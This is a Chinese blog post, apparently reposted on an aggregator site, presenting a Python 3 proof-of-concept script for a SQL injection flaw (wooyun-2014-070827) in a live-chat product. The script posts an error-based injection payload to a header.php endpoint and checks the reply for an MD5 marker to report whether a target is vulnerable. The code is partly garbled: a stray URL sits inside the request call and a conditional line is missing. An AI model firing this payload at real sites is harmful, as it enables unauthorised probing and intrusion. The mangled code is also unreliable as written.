首页 > 代码库 > Python3实现PoC——wooyun-2014-070827(SQL注入)
Python3实现PoC——wooyun-2014-070827(SQL注入)
一、演示一下的利用效果
二、漏洞说明
这次的PoC是验证SQL注入,漏洞详情
三、代码+注释
import requests import argparse parser = argparse.ArgumentParser() parser.add_argument(‘-u‘, dest="url") args = parser.parse_args() url = args.url # 存在漏洞的页面 url += "/celive/live/header.php" # 构造payload,用md5结果来验证 payload = { ‘xajax‘: ‘LiveMessage‘, ‘xajaxargs[0][name]‘: "1‘,(SELECT 1 FROM (select count(*)," "concat(floor(rand(0)*2),(select md5(888)))a" " from information_schema.tables group by a)b)" ",‘‘,‘‘,‘‘,‘1‘,‘127.0.0.1‘,‘2‘) #" } try: r = requests.post(url, data=http://www.mamicode.com/payload)"0a113ef6b61820daa5611c870ed8d5ee" in r.text: print("{} is SQL_vul".format(url)) else: print("{} is not SQL_vul".format(url)) except Exception as e: print(str(e))
本文出自 “李春光的技术博客” 博客,请务必保留此出处http://lichunguang.blog.51cto.com/10274243/1883810
Python3实现PoC——wooyun-2014-070827(SQL注入)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。